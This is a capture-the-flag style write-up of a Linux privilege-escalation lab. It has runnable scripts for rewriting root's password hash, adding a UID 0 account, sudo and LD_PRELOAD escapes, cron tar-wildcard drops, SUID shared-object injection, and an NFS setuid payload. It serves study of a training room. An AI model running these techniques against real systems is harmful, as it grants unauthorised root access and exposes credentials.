Linux Privilege Escalation

Notes from Tib3rius' Linux Privilege Escalation room on TryHackMe (with some overlap with TCM's material)

TryHackMe Linux PrivEsc Write-Up

topics: Linux Privilege Escalation, post exploitation (looting)

  1. Service Exploits

  2. File Permissions

  3. Sudo Bypass

  4. Cron Jobs

  5. SUID/SGID Executables

  6. Passwords & Keys

  7. NFS

  8. Kernel Exploits

new tools: unix-privesc-check, linuxprivchecker, strace, perl, env, bash function and export, mount

tools: nmapAutomator, nc, gcc, strings, enum4linux, LinPEAS, LinEnum, LSE, chmod, touch, find, msfvenom

Overview of Linux Privilege Escalation

As with any operating system, there are numerous ways to take advantage of system processes, configuration files, outdated kernel versions, OS-specific vulnerabilities, and so on.

The room covers a specific set of these; the notes below record each technique, how it generalises, and what the techniques have in common.

Helpful references: the Linux Pocket Guide (PDF), the Arch Wiki, and open-source books.

Cheatsheets

Service Exploits

ps -elf | grep root lists all processes and services run by root (grep root also matches lines that merely mention root, e.g. in arguments, so read the UID column rather than trusting the match)

In the room's output, MySQL is running as the root user and the root database account has no password set. Anything we can make MySQL execute therefore runs as root.

The exploit used comes from searchsploit and is one of many examples of abusing a service that runs as root: identify the service and its version, then search for a known exploit for that version.
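The enumeration step above, as an added example that is not the room's code: pull the root-owned processes out of ps -elf without the false positives of grep root, then reduce them to binary names to look up in searchsploit. The ps output is constructed for the demo; the MySQL probe only means something on the target.

```sh
#!/bin/sh
# Added example, not the room's code: root-owned processes from `ps -elf`
# output. The ps sample below is constructed.

# `ps -elf` has 14 fixed columns (F S UID PID PPID C PRI NI ADDR SZ WCHAN
# STIME TTY TIME) before CMD, so CMD is field 15 onwards. Filter on the UID
# column, skip kernel threads ([name]) and print each distinct command once.
root_commands() {
    awk '
        $3 == "UID" { next }             # header line
        $3 != "root" { next }            # UID column
        $15 ~ /^\[.*\]$/ { next }        # kernel threads: [kthreadd], [kworker/0:1]
        {
            cmd = $15
            for (i = 16; i <= NF; i++) cmd = cmd " " $i
            if (!(cmd in seen)) { seen[cmd] = 1; print cmd }
        }'
}

# Reduce the command lines to binary names: these are the strings to look up
# (searchsploit mysql, searchsploit "mysql 5.1", ...) together with the
# version the service reports (mysqld --version and the like).
root_binaries() {
    root_commands | awk '{ n = split($1, p, "/"); print p[n] }' | sort -u
}

# The room's finding: MySQL running as root with no root password. Succeeds
# when `mysql -u root` gets in without a password (target only; not run here).
mysql_root_nopass() {
    mysql -u root -e 'SELECT @@version;' >/dev/null 2>&1
}

# Constructed sample in procps column layout.
SAMPLE_PS=$(cat <<'EOF'
F S UID        PID  PPID  C PRI  NI ADDR SZ WCHAN  STIME TTY          TIME CMD
4 S root         1     0  0  80   0 -  9464 -      10:21 ?        00:00:01 /sbin/init
1 S root         2     0  0  80   0 -     0 -      10:21 ?        00:00:00 [kthreadd]
1 S root        14     2  0  80   0 -     0 -      10:21 ?        00:00:00 [kworker/0:1]
4 S root       912     1  0  80   0 - 17118 -      10:22 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
4 S root      1034   912  0  80   0 - 50382 -      10:22 ?        00:00:02 /usr/sbin/mysqld --basedir=/usr --user=root
4 S root      1201     1  0  80   0 - 11256 -      10:22 ?        00:00:00 /usr/sbin/sshd -D
4 S www-data  1305  1290  0  80   0 - 18432 -      10:22 ?        00:00:00 /usr/sbin/apache2 -k start
4 S www-data  1306  1290  0  80   0 - 18432 -      10:22 ?        00:00:00 /usr/sbin/apache2 -k start
4 S root      1290     1  0  80   0 - 18432 -      10:22 ?        00:00:00 /usr/sbin/apache2 -k start
4 S user      1400  1201  0  80   0 -  5201 -      10:23 ?        00:00:00 sshd: user@pts/0
EOF
)

printf '%s\n' "$SAMPLE_PS" | root_commands
printf '%s\n' "$SAMPLE_PS" | root_binaries
```

On a live box, pipe the real output in: ps -elf | root_commands. The --user=root on the mysqld line is the detail to notice; a service that drops privileges would show a different UID on its worker processes, as apache2 does here.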

Weak File Permissions

/etc/shadow

/etc/shadow holds the password hashes of every user on the system, including root. Normally only root can read it. If it is readable by our user we can crack the hashes offline; if it is writable we can replace a hash outright.

We can check our permissions with ls -la /etc/shadow

Here we have read and write permissions on the file. We can view every password hash and even change them. First read the file, save root's hash to a text file and crack it with john.

Read

Write

We can make a new hash in the $6$ format (SHA-512 crypt; the prefix identifies the type, or use hash-identifier). Generate it with mkpasswd -m sha-512 and enter the new password, then paste the hash in place of root's second field and su root with the new password.

/etc/passwd

/etc/passwd lists every user with its UID, GID, home directory and login shell. The second field is normally an x, meaning the hash lives in /etc/shadow; if a hash is placed there instead, it is used for authentication.

Checking permissions with ls -la /etc/passwd

We have read/write permissions on the file. We can generate a new password hash (as above) and replace the x in root's line with it.

We can also copy root's line, change the username to newroot, keep UID 0 and append it: newroot is then a second root account with the password we chose.
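The /etc/shadow and /etc/passwd edits above as functions, added here and not part of the room: they take the file path so the edit can be rehearsed on a copy before touching the real files. User names, paths and the hash value are assumptions; the demo uses a placeholder string where the mkpasswd output would go.

```sh
#!/bin/sh
# Added example, not the room's code: shadow/passwd tampering helpers.
# Generate the replacement hash on the attacking machine (either works):
#   mkpasswd -m sha-512 NewPassword
#   openssl passwd -6 NewPassword      (OpenSSL 1.1.1+; -1 gives MD5 crypt)
# A "$6$" prefix marks SHA-512 crypt, which is what /etc/shadow normally holds.

# Replace field 2 (the hash) of USER's line in FILE. Written back with cat so
# the file keeps its owner and mode; mv would replace it with a file of ours.
set_hash_field() {
    file=$1; user=$2; new_hash=$3
    tmp=$(mktemp)
    awk -F: -v u="$user" -v h="$new_hash" 'BEGIN { OFS = ":" } $1 == u { $2 = h } { print }' "$file" > "$tmp"
    cat "$tmp" > "$file"
    rm -f "$tmp"
}

# USER's hash field from FILE (shadow or passwd), to confirm the write landed.
hash_field() {
    awk -F: -v u="$2" '$1 == u { print $2 }' "$1"
}

# /etc/shadow route: overwrite root's hash, then `su root` with the new password.
set_shadow_hash() { set_hash_field "$1" root "$2"; }

# /etc/passwd route (a): put the hash in place of root's x, so the shadow
# entry is no longer consulted.
set_passwd_hash() { set_hash_field "$1" root "$2"; }

# /etc/passwd route (b): append a second UID 0 account. Everything after the
# hash is copied from root's line; only the name differs.
add_uid0_user() {
    file=$1; name=$2; hash=$3
    root_line=$(awk -F: '$1 == "root"' "$file")
    printf '%s\n' "$root_line" | awk -F: -v n="$name" -v h="$hash" 'BEGIN { OFS = ":" } { $1 = n; $2 = h; print }' >> "$file"
}

# Every account with UID 0: confirms the edit, and is also worth checking on
# any box to see whether someone else got here first.
uid0_users() { awk -F: '$3 == 0 { print $1 }' "$1"; }

# Demo on constructed copies in a temp dir, with a placeholder hash.
demo() {
    d=$(mktemp -d)
    printf 'root:$6$old$oldhash:19000:0:99999:7:::\nuser:$6$u$userhash:19000:0:99999:7:::\n' > "$d/shadow"
    printf 'root:x:0:0:root:/root:/bin/bash\nuser:x:1000:1000:user:/home/user:/bin/bash\n' > "$d/passwd"
    set_shadow_hash "$d/shadow" '$6$PLACEHOLDER$REPLACE_WITH_MKPASSWD_OUTPUT'
    add_uid0_user "$d/passwd" newroot '$6$PLACEHOLDER$REPLACE_WITH_MKPASSWD_OUTPUT'
    hash_field "$d/shadow" root
    uid0_users "$d/passwd"
    rm -rf "$d"
}
demo
```

Keep a copy of the original line (or the whole file) before editing: a malformed /etc/passwd can lock everyone out, including the root shell you were after.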

Bypass Sudo

Shell Escape Sequences

GTFOBins is a curated collection of Unix binaries that can be abused to bypass local restrictions, including sudo and SUID shell escapes.

sudo -l lists all commands the user can use with sudo permissions

We can become root by

  • vim: sudo vim, then :!bash (or use sudo vim /etc/sudoers to give ourselves ALL)

  • nmap (old versions with interactive mode): sudo nmap --interactive, then !sh

  • iftop: sudo iftop, press shift+! and at the Command> prompt enter /bin/sh

  • find: sudo find . -exec /bin/sh \; -quit

  • nano: sudo nano, Ctrl+R Ctrl+X, then reset; sh 1>&0 2>&0. Didn't work on this box but you can just edit the sudoers file

  • man: sudo man man, then !/bin/sh

  • awk: sudo awk 'BEGIN {system("/bin/sh")}'

  • less: sudo less /etc/profile, then !/bin/sh

  • ftp: sudo ftp, then !/bin/sh

  • more: TERM= sudo more /etc/profile, then !/bin/sh

The list is almost endless.

Environment Variables
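Triage of sudo -l output, added here and not the room's code: it flags binaries with one of the shell escapes listed above, and an env_keep that passes LD_PRELOAD through sudo, which is the case the Environment Variables heading refers to. The sudo -l text is read from stdin; the sample at the bottom is constructed, and the binary paths and payload are assumptions.

```sh
#!/bin/sh
# Added example, not the room's code: sudo -l triage.

# Basenames with an escape from the list above (GTFOBins has many more).
ESCAPABLE="vim nmap iftop find nano man awk less ftp more"

# Print each sudo-able command whose basename is in ESCAPABLE. Handles
# "(root) NOPASSWD: /usr/bin/vim", "(ALL : ALL) ALL" and comma-separated lists.
sudo_escapes() {
    awk -v list="$ESCAPABLE" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) known[a[i]] = 1 }
        {
            line = $0
            sub(/^[ \t]+/, "", line)
            if (line !~ /^\(/) next                  # only the "(runas) ..." lines
            sub(/^\([^)]*\)[ \t]*/, "", line)        # drop "(root)" / "(ALL : ALL)"
            gsub(/[A-Z]+:[ \t]*/, "", line)          # drop NOPASSWD:, SETENV:, ... tags
            m = split(line, cmds, /,[ \t]*/)
            for (i = 1; i <= m; i++) {
                split(cmds[i], w, /[ \t]+/)
                path = w[1]
                k = split(path, p, "/")
                if (path == "ALL") print "ALL (any command, e.g. sudo su)"
                else if (p[k] in known) print path
            }
        }'
}

# True when the Defaults line keeps LD_PRELOAD or LD_LIBRARY_PATH: a shared
# object we control is then loaded into whatever we are allowed to sudo.
sudo_keeps_ld_preload() {
    grep -q -E 'env_keep\+?=.*LD_(PRELOAD|LIBRARY_PATH)'
}

# Payload for the LD_PRELOAD route (assumed path; _init runs before the
# target's main, and -nostartfiles is needed because we define _init):
#   gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
#   sudo LD_PRELOAD=/tmp/preload.so <any binary from sudo -l>
write_preload_c() {
    cat > "$1" <<'EOF'
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void _init(void) {
    unsetenv("LD_PRELOAD");      /* do not re-inject into the shell we spawn */
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
EOF
}

# Constructed sample of `sudo -l` output.
SAMPLE_SUDO=$(cat <<'EOF'
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less, /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/apache2
    (root) NOPASSWD: /bin/more
EOF
)

printf '%s\n' "$SAMPLE_SUDO" | sudo_escapes
printf '%s\n' "$SAMPLE_SUDO" | sudo_keeps_ld_preload && echo "sudo keeps LD_PRELOAD"
```

On a target: sudo -l | sudo_escapes. A binary that is not in the list (apache2 in the sample) is not a dead end; check it on GTFOBins, and if LD_PRELOAD is kept it does not matter which binary you pick.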

Cron Jobs

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.

Useful commands:

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

File Permissions

View the system-wide cron table with cat /etc/crontab, then ls -l each script it runs as root. If one is writable by us, we can append a payload (a reverse shell, or a chmod +s on a copy of bash) and wait for the next run.

PATH Environment Variable

cat /etc/crontab and look at the PATH= line. If a job calls a script by bare name, cron searches that PATH in order; if an earlier directory (e.g. /home/user) is writable by us, a file of the same name placed there runs instead of the real script.

Wildcards

cat /etc/crontab && cat /usr/local/bin/compress.sh

The tar command is being used with a wildcard *. The shell expands * to the file names in the working directory, so files named like tar options (--checkpoint=1 and --checkpoint-action=exec=...) are passed to tar as options and the named command runs as root.
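One audit for the three cron weaknesses above (writable script, PATH hijack, tar wildcard) plus the file drop for the wildcard case, added here and not the room's code. The crontab format, payload and every path are assumptions; the demo builds its own crontab and scripts in a temp directory.

```sh
#!/bin/sh
# Added example, not the room's code: cron audit for the three cases above.

# Other-writable according to the ls mode string. Checking the bits rather
# than `test -w` keeps the answer honest when the audit itself runs as root.
world_writable() {
    [ "$(ls -ld "$1" 2>/dev/null | cut -c9)" = "w" ]
}

# The command part of a system crontab line: field 7 after the five time
# fields and the user, or field 3 for "@reboot user cmd".
cron_command() {
    printf '%s\n' "$1" | awk '{
        start = ($1 ~ /^@/) ? 3 : 7
        cmd = ""
        for (i = start; i <= NF; i++) cmd = cmd (i > start ? " " : "") $i
        print cmd
    }'
}

# Audit the crontab at $1, printing one line per finding.
cron_findings() {
    cron_path="/usr/bin:/bin"              # cron's default when no PATH= line is set
    while IFS= read -r line; do
        case $line in
            ''|'#'*) continue ;;
            PATH=*) cron_path=${line#PATH=}; continue ;;
            [A-Za-z_]*=*) continue ;;      # other assignments (MAILTO=, SHELL=)
        esac
        cmd=$(cron_command "$line")
        prog=${cmd%% *}
        case $prog in
            /*)
                # File Permissions: the script cron runs as root is writable by us.
                if world_writable "$prog"; then
                    printf 'WRITABLE: %s (append a payload, wait for the next run)\n' "$prog"
                fi ;;
            *)
                # PATH: a bare name is searched through cron's PATH in order; a
                # writable directory before the real script wins.
                for dir in $(printf '%s' "$cron_path" | tr ':' ' '); do
                    [ -x "$dir/$prog" ] && break
                    if world_writable "$dir"; then
                        printf 'PATH-HIJACK: %s via writable %s (drop %s/%s)\n' "$prog" "$dir" "$dir" "$prog"
                        break
                    fi
                done ;;
        esac
        # Wildcards: tar with * in the crontab line itself or in the script it runs.
        if printf '%s\n' "$cmd" | grep -q 'tar .*\*'; then
            printf 'WILDCARD: %s\n' "$cmd"
        elif [ -r "$prog" ] && grep -q 'tar .*\*' "$prog" 2>/dev/null; then
            printf 'WILDCARD: %s runs: %s\n' "$prog" "$(grep 'tar .*\*' "$prog")"
        fi
    done < "$1"
}

# Wildcard drop: these two file names are expanded by * and read by tar as
# options, so shell.sh runs as the cron user (root) at the first checkpoint.
tar_checkpoint_payload() {
    dir=$1
    cat > "$dir/shell.sh" <<'EOF'
#!/bin/sh
cp /bin/bash /tmp/rootbash && chmod +xs /tmp/rootbash   # afterwards: /tmp/rootbash -p
EOF
    chmod +x "$dir/shell.sh"
    touch "$dir/--checkpoint=1" "$dir/--checkpoint-action=exec=sh shell.sh"
}

# Demo: a world-writable compress.sh using tar *, and a cron PATH that starts
# with a directory we can write to (all constructed).
demo() {
    d=$(mktemp -d)
    mkdir -p "$d/bin" "$d/scripts" "$d/home"
    chmod 777 "$d/bin"
    printf '#!/bin/sh\ncd %s/home && tar czf /tmp/backup.tar.gz *\n' "$d" > "$d/scripts/compress.sh"
    chmod 777 "$d/scripts/compress.sh"
    printf 'PATH=%s/bin:/usr/bin:/bin\n* * * * * root overwrite.sh\n* * * * * root %s/scripts/compress.sh\n' "$d" "$d" > "$d/crontab"
    cron_findings "$d/crontab"
    tar_checkpoint_payload "$d/home"
    ls "$d/home"
    rm -rf "$d"
}
demo
```

On a target: cron_findings /etc/crontab, and the same for the files under /etc/cron.d. The wildcard drop has to land in the directory tar is run from (the cd in compress.sh), not in the directory being archived elsewhere.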

SUID/SGID Executables

An SUID executable runs with the permissions of its owner rather than of the user who launched it; SGID does the same with the group owner. If the owner is root, whatever the program does (or can be made to do) happens as root.

Known Exploits

find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null lists all SUID files

find / -perm -g=s -type f 2>/dev/null lists all SGID files

GTFOBins lists standard binaries that can be abused when SUID; check each file found above against it, and check the version of anything non-standard against searchsploit.

Shared Object Injection

Environment Variables

Exploiting Shell Features

The following doesn't work on bash 4.4 and later; check the version with /bin/bash --version
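Helpers for the SUID techniques above (known exploits, shared object injection, PATH hijack, the bash version caveat), added here and not the room's code. strace and strings output are read from stdin so constructed samples can be used; the binary names, library paths, payloads and version cutoffs are assumptions, and the constructor payload is a typical one rather than something shown on the page.

```sh
#!/bin/sh
# Added example, not the room's code: SUID/SGID helpers.

# Known Exploits: the two find commands above as one call (not run in the demo).
find_suid_sgid() {
    find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -ld {} \; 2>/dev/null
}

# Shared Object Injection: from `strace -v -f -e execve <suid-bin> 2>&1`,
# print .so paths the binary failed to open whose directory we can write to
# (as an unprivileged user, `test -w` gives the true answer here).
missing_writable_libs() {
    grep -E 'open(at)?\(.*\.so[^"]*".* ENOENT' |
    sed -E 's/.*"([^"]*\.so[^"]*)".*/\1/' |
    while IFS= read -r lib; do
        dir=$(dirname "$lib")
        if [ -d "$dir" ] && [ -w "$dir" ]; then printf '%s\n' "$lib"; fi
    done
}

# Constructor payload to build at that path (assumed name):
#   gcc -shared -fPIC -o /home/user/.config/libcalc.so libcalc.c
# It runs when the SUID binary loads the library, before its main.
write_libcalc_c() {
    cat > "$1" <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void inject(void) __attribute__((constructor));

void inject(void) {
    setuid(0);
    system("/bin/bash -p");
}
EOF
}

# Environment Variables (PATH): from `strings <suid-bin>`, print strings that
# look like a command run by bare name: first word resolves on our PATH and
# has no leading slash. Single words are skipped (symbol names such as
# "system" would resolve too).
relative_commands() {
    while IFS= read -r s; do
        first=${s%% *}
        case $first in ''|/*|*[!A-Za-z0-9_.-]*) continue ;; esac
        if [ "$first" != "$s" ] && command -v "$first" >/dev/null 2>&1; then
            printf '%s\n' "$s"
        fi
    done
}

# Drop a fake binary of that name into a directory, then run the SUID binary
# with that directory first in PATH:  PATH=/tmp:$PATH /usr/local/bin/suid-env
write_path_hijack() {
    printf '#!/bin/sh\ncp /bin/bash /tmp/rootbash && chmod +xs /tmp/rootbash\n' > "$1/$2"
    chmod +x "$1/$2"
}

# Exploiting Shell Features: both tricks depend on the bash version, so
# compare the version string (e.g. "4.3.48(1)-release") against a cutoff.
#   function export: function /usr/sbin/service { /bin/bash -p; }; export -f /usr/sbin/service   (bash before 4.2-048)
#   PS4/xtrace:      env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash)' <suid-bin>   (bash before 4.4)
bash_version_below() {
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%.*}
    [ "$major" -lt "$2" ] || { [ "$major" -eq "$2" ] && [ "$minor" -lt "$3" ]; }
}

# Demo against constructed strace/strings output in a temp dir.
demo() {
    d=$(mktemp -d); mkdir "$d/.config"
    printf 'open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3\nopen("%s/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)\n' "$d" | missing_writable_libs
    printf 'libc.so.6\nsystem\nservice apache2 start\nls -la /tmp\nGLIBC_2.2.5\n' | relative_commands
    ver=$(bash --version 2>/dev/null | sed -En '1s/.*version ([0-9]+\.[0-9]+[^ ]*).*/\1/p')
    if [ -n "$ver" ]; then
        if bash_version_below "$ver" 4 4; then echo "bash $ver: PS4 trick applies"; else echo "bash $ver: PS4 trick patched (4.4+)"; fi
    fi
    rm -rf "$d"
}
demo
```

Usage on a target: strace -v -f -e execve /usr/local/bin/suid-so 2>&1 | missing_writable_libs, and strings /usr/local/bin/suid-env | relative_commands. The version check reads bash --version on the box where the SUID binary runs, not on the attacking machine.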

Passwords & Keys

History Files

cat ~/.*history | less

Configuration Files

SSH Keys
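The three loot locations above (history files, configuration files, SSH keys) as one set of checks over a directory, added here and not the room's code. Taking the directory as a parameter means the same functions can be rehearsed on a constructed tree; the grep patterns, file extensions and sample contents are assumptions to be tuned for the target.

```sh
#!/bin/sh
# Added example, not the room's code: password and key hunting under $1.

# History Files: command lines that carried a credential. Same idea as
# `cat ~/.*history`, but keeps the file name and line number.
history_secrets() {
    for f in "$1"/.*history; do
        [ -f "$f" ] || continue
        grep -n -E -i -- '-p[^ ]+|--password|sshpass|passwd|pass(word)?[=: ]' "$f" 2>/dev/null |
            sed "s|^|$f:|"
    done
}

# Configuration Files: settings that look like a stored password (in the room
# an OpenVPN config pointed at an auth-user-pass file). -I skips binaries.
config_passwords() {
    find "$1" -type f \( -name '*.conf' -o -name '*.cfg' -o -name '*.ini' -o -name '*.ovpn' \
        -o -name '*.txt' -o -name '*.xml' -o -name '*.yml' -o -name '*.yaml' -o -name '*.php' \) \
        -exec grep -l -I -i -E '(password|passwd|pwd|auth-user-pass)' {} + 2>/dev/null
}

# SSH Keys: private keys anywhere below $1 (not only .ssh), with their mode.
# A key we can read is what matters, wherever it sits.
private_keys() {
    find "$1" -type f -exec grep -l -I -E -- '-----BEGIN [A-Z ]*PRIVATE KEY-----' {} + 2>/dev/null |
    while IFS= read -r key; do
        printf '%s %s\n' "$(ls -l "$key" | cut -c1-10)" "$key"
    done
}
# Using a key: cp key /tmp/k && chmod 600 /tmp/k && ssh -i /tmp/k root@<target>
# (ssh refuses a key file that is readable by others, hence the copy and chmod).

# Demo on a constructed home directory.
demo() {
    d=$(mktemp -d)
    mkdir -p "$d/.ssh"
    printf 'ls -la\nmysql -h somehost.local -uroot -pFakePass123\ncd /tmp\n' > "$d/.bash_history"
    printf 'client\nremote 10.10.10.10 1194\nauth-user-pass /etc/openvpn/auth.txt\n' > "$d/myvpn.ovpn"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'MIIEpAIBAAKCAQEAconstructed' '-----END RSA PRIVATE KEY-----' > "$d/.ssh/root_key"
    chmod 644 "$d/.ssh/root_key"
    history_secrets "$d"
    config_passwords "$d"
    private_keys "$d"
    rm -rf "$d"
}
demo
```

Run it as history_secrets ~ and config_passwords / (the latter is slow and noisy on a full filesystem; /etc, /opt, /var/www and home directories are the usual places). A config that only references a credential file, like the auth-user-pass line, is itself the lead: read the file it points to.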

NFS
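The NFS check, added here and not the room's code: parse an exports file for no_root_squash, the option that turns an NFS share into a privilege escalation route, with the follow-up steps as comments. The target host, paths and pay
load are assumptions; the demo parses a constructed /etc/exports.

```sh
#!/bin/sh
# Added example, not the room's code: no_root_squash check for /etc/exports.

# Print "path client options" for every export that disables root squashing.
# With root_squash (the default) a remote root is mapped to nobody; with
# no_root_squash, files we create over the mount as root are owned by root
# on the target, SUID bit included.
nfs_no_root_squash() {
    awk '
        /^[ \t]*#/ || NF == 0 { next }
        {
            for (i = 2; i <= NF; i++) {
                n = split($i, parts, "(")
                client = parts[1]
                opts = (n > 1) ? parts[2] : ""
                sub(/\)$/, "", opts)
                if (opts ~ /(^|,)no_root_squash(,|$)/)
                    printf "%s %s %s\n", $1, (client == "" ? "*" : client), opts
            }
        }' "$1"
}

# From the attacking machine (as root), once an export is found:
#   showmount -e <target>                           # list exports remotely
#   mkdir /tmp/nfs && mount -o rw <target>:/tmp /tmp/nfs
#   msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
#   chmod +xs /tmp/nfs/shell.elf                    # root-owned thanks to no_root_squash
# then on the target as the low-privileged user:   /tmp/shell.elf
# A copied /bin/bash only works if the attacker's libc matches the target's;
# a static payload such as the msfvenom ELF avoids that.

# Constructed /etc/exports for the demo.
SAMPLE_EXPORTS=$(cat <<'EOF'
# /etc/exports: the access control list for filesystems which may be exported
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/backups 10.0.0.0/24(ro,sync,root_squash)
/home/share *(rw,no_subtree_check)
EOF
)

demo() {
    f=$(mktemp)
    printf '%s\n' "$SAMPLE_EXPORTS" > "$f"
    nfs_no_root_squash "$f"
    rm -f "$f"
}
demo
```

On the target, nfs_no_root_squash /etc/exports; the share also has to be reachable from the attacking machine (port 2049), which showmount -e confirms.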

Kernel Exploits

Privilege Escalation Scripts

There are numerous enumeration scripts we can use. Shell scripts conventionally carry the .sh extension, so searching for those is a quick way to find any already present on the box.

Find any file of a given type with find . -type f -name '*.<FILETYPE>'

LinEnum

LinPEAS

LSE

Linux Exploit Suggester 2

unix-privesc-check

linuxprivchecker
